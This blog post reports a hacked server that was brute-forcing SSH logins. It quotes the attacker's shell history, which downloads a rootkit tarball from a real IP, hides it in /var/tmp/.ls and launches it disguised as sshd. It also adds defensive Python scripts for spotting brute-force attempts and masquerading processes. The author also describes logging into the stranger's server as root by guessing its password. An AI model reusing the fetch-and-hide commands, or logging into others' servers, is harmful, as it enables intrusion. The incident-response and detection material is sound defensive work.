I think your server has been hacked !!!
Dear server administrators, I think your server (72.249.xx.xx) has been hacked and is being used for malicious purposes right now. During a routine check of my own server (based in Germany) I found that it was being attacked (brute-force password guessing) from 72.249.xx.xx, which is your server. Trying to find out what to do about this, I tried to log in (via ssh) to your server, which was trivially possible (the root password is very, very simple, I guessed it on my first attempt). Please change your password ASAP. While logged in to your server, I could see that a process was probing other servers on the Internet to find more weak passwords. I also saw another user logged in (as root) from 79.116.xx.xx, which may or may not be the attacker. Since I have no business nosing around on your server, I logged out again without doing anything. Best regards, Thilo Planz
I wish my UNIX-fu was stronger, I did not really know what to do about this, which is probably a good thing, since I really have no business being on their server. But still, I felt like killing this guy's processes and blocking his IP. Although, I suppose this whole thing is an automated process, and he would not even notice me slapping his fingers.
What I could see is that he was spawning lots of ssh processes, apparently searching whole IP ranges for easy root passwords (which is how he must have gotten to this American high school's server).
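The "routine check" that turned this up is something you can script. The following is an added example, not code from the post: it reads sshd log lines, counts failed password attempts per source address inside a sliding time window, and flags addresses that exceed a threshold, which is what a password-guessing scanner like the one described above looks like from the target's side. The log lines are constructed to match OpenSSH's usual "Failed password" format (the regex and the assumed year are assumptions; real distributions vary slightly), and the addresses are documentation ranges, not the ones in the post.

```python
"""Flag source IPs that hammer sshd with failed password attempts (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of sshd auth.log lines (syslog-style timestamps carry no year).
SAMPLE_LOG = """\
Mar  3 10:00:01 host sshd[1201]: Failed password for root from 72.249.0.10 port 40112 ssh2
Mar  3 10:00:02 host sshd[1202]: Failed password for root from 72.249.0.10 port 40113 ssh2
Mar  3 10:00:03 host sshd[1203]: Failed password for invalid user admin from 72.249.0.10 port 40114 ssh2
Mar  3 10:00:04 host sshd[1204]: Failed password for root from 72.249.0.10 port 40115 ssh2
Mar  3 10:00:05 host sshd[1205]: Failed password for root from 72.249.0.10 port 40116 ssh2
Mar  3 10:00:06 host sshd[1206]: Failed password for root from 72.249.0.10 port 40117 ssh2
Mar  3 10:00:30 host sshd[1207]: Accepted publickey for thilo from 203.0.113.5 port 51000 ssh2
Mar  3 10:01:00 host sshd[1208]: Failed password for thilo from 203.0.113.5 port 51001 ssh2
Mar  3 10:20:00 host sshd[1209]: Failed password for root from 198.51.100.7 port 6000 ssh2
Mar  3 11:30:00 host sshd[1210]: Failed password for root from 198.51.100.7 port 6001 ssh2
"""

# Matches both "Failed password for root ..." and "Failed password for invalid user X ...".
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_failures(log_text, year=2024):
    """Yield (timestamp, user, ip) for every failed-password line; year is assumed."""
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["user"], m["ip"]


def find_bruteforcers(log_text, threshold=5, window_seconds=60):
    """Return {ip: (peak_failures_in_window, set_of_users_tried)} for addresses
    that reach `threshold` failures within any `window_seconds` span."""
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    users = defaultdict(set)      # ip -> account names attempted
    flagged = {}
    for ts, user, ip in parse_failures(log_text):
        q = recent[ip]
        q.append(ts)
        users[ip].add(user)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()           # drop attempts that have aged out of the window
        if len(q) >= threshold:
            peak = max(flagged.get(ip, (0, None))[0], len(q))
            flagged[ip] = (peak, users[ip])
    return flagged


if __name__ == "__main__":
    for ip, (count, names) in find_bruteforcers(SAMPLE_LOG).items():
        print(f"{ip}: {count} failures in one window, users tried: {sorted(names)}")
```

On the sample, only 72.249.0.10 is flagged (six failures in six seconds, trying both root and admin); the two failures from 198.51.100.7 are seventy minutes apart and stay below the threshold, and the single mistyped password from the legitimate key-based user is ignored. Tune the threshold and window to your own traffic before feeding the flagged addresses into a firewall rule.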
The command history had this interesting sequence, which downloads a root kit and then starts a hidden web server to propagate itself or maybe remotely control the machine.
cd /var/tmp
ls -a
wget http://63.249.225.72/icons/stealth.tgz
tar zxvf stealth.tgz
rm -rf stealth.tgz
mv l .ls
cd .ls
./h -s "/usr/sbin/sshd" ./httpd
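The last command in that history is the interesting one for a defender: the rootkit's httpd is launched under the name /usr/sbin/sshd, so a casual look at ps shows nothing unusual. On Linux the kernel still records the real binary in /proc/<pid>/exe, so the advertised name can be checked against it. The script below is an added example (not from the post or the rootkit): it flags processes whose argv[0] names a different binary than the one actually executing, and processes that run out of a dot-directory under /tmp or /var/tmp, like the .ls directory created above. The sample records are constructed; the live scan_proc() helper only works on Linux and needs enough privilege to read other users' /proc entries. Caveat: this catches userland name spoofing of the kind shown here, not a kernel module that lies to /proc itself.

```python
"""Detect processes whose displayed name does not match their binary (added example)."""
import os
from dataclasses import dataclass


@dataclass
class ProcRecord:
    pid: int
    argv0: str   # first element of /proc/<pid>/cmdline, which is what ps displays
    exe: str     # target of the /proc/<pid>/exe symlink, the binary really running
    cwd: str     # target of the /proc/<pid>/cwd symlink


def is_masquerading(rec):
    """True when argv[0] claims a different program than the executing binary.
    A leading '-' (login shells) and a ' (deleted)' suffix are normal and ignored."""
    claimed = os.path.basename(rec.argv0).lstrip("-")
    actual = os.path.basename(rec.exe.split(" (deleted)")[0])
    return claimed != actual


def is_hidden_dir(path):
    """True for paths under /tmp or /var/tmp with a dot-named component."""
    if not path.startswith(("/tmp/", "/var/tmp/")):
        return False
    return any(part.startswith(".") for part in path.split("/") if part)


def suspicious(records):
    """Return [(pid, [reason, ...])] for records that trip either check."""
    findings = []
    for r in records:
        reasons = []
        if is_masquerading(r):
            reasons.append(f"argv0 {r.argv0!r} but exe is {r.exe!r}")
        if is_hidden_dir(r.exe) or is_hidden_dir(r.cwd):
            reasons.append("runs from a hidden directory under a temp directory")
        if reasons:
            findings.append((r.pid, reasons))
    return findings


def scan_proc():
    """Collect live records from /proc (Linux only; unreadable entries are skipped)."""
    out = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        base = f"/proc/{name}"
        try:
            with open(f"{base}/cmdline", "rb") as f:
                argv0 = f.read().split(b"\0")[0].decode(errors="replace")
            exe = os.readlink(f"{base}/exe")
            cwd = os.readlink(f"{base}/cwd")
        except OSError:
            continue  # kernel threads, exited processes, or no permission
        if argv0:
            out.append(ProcRecord(int(name), argv0, exe, cwd))
    return out


# Constructed sample mirroring the post: the rootkit's httpd shows up as
# /usr/sbin/sshd in ps but executes out of /var/tmp/.ls.
SAMPLE = [
    ProcRecord(1000, "/usr/sbin/sshd", "/usr/sbin/sshd", "/"),
    ProcRecord(2345, "/usr/sbin/sshd", "/var/tmp/.ls/httpd", "/var/tmp/.ls"),
    ProcRecord(2346, "-bash", "/bin/bash", "/root"),
]

if __name__ == "__main__":
    for pid, reasons in suspicious(SAMPLE):
        print(pid, "; ".join(reasons))
```

Run against the sample, only pid 2345 is reported, on both counts; the genuine sshd and the login shell pass. On a live host, replace SAMPLE with scan_proc() and compare the exe targets of anything flagged against your package manager's file list.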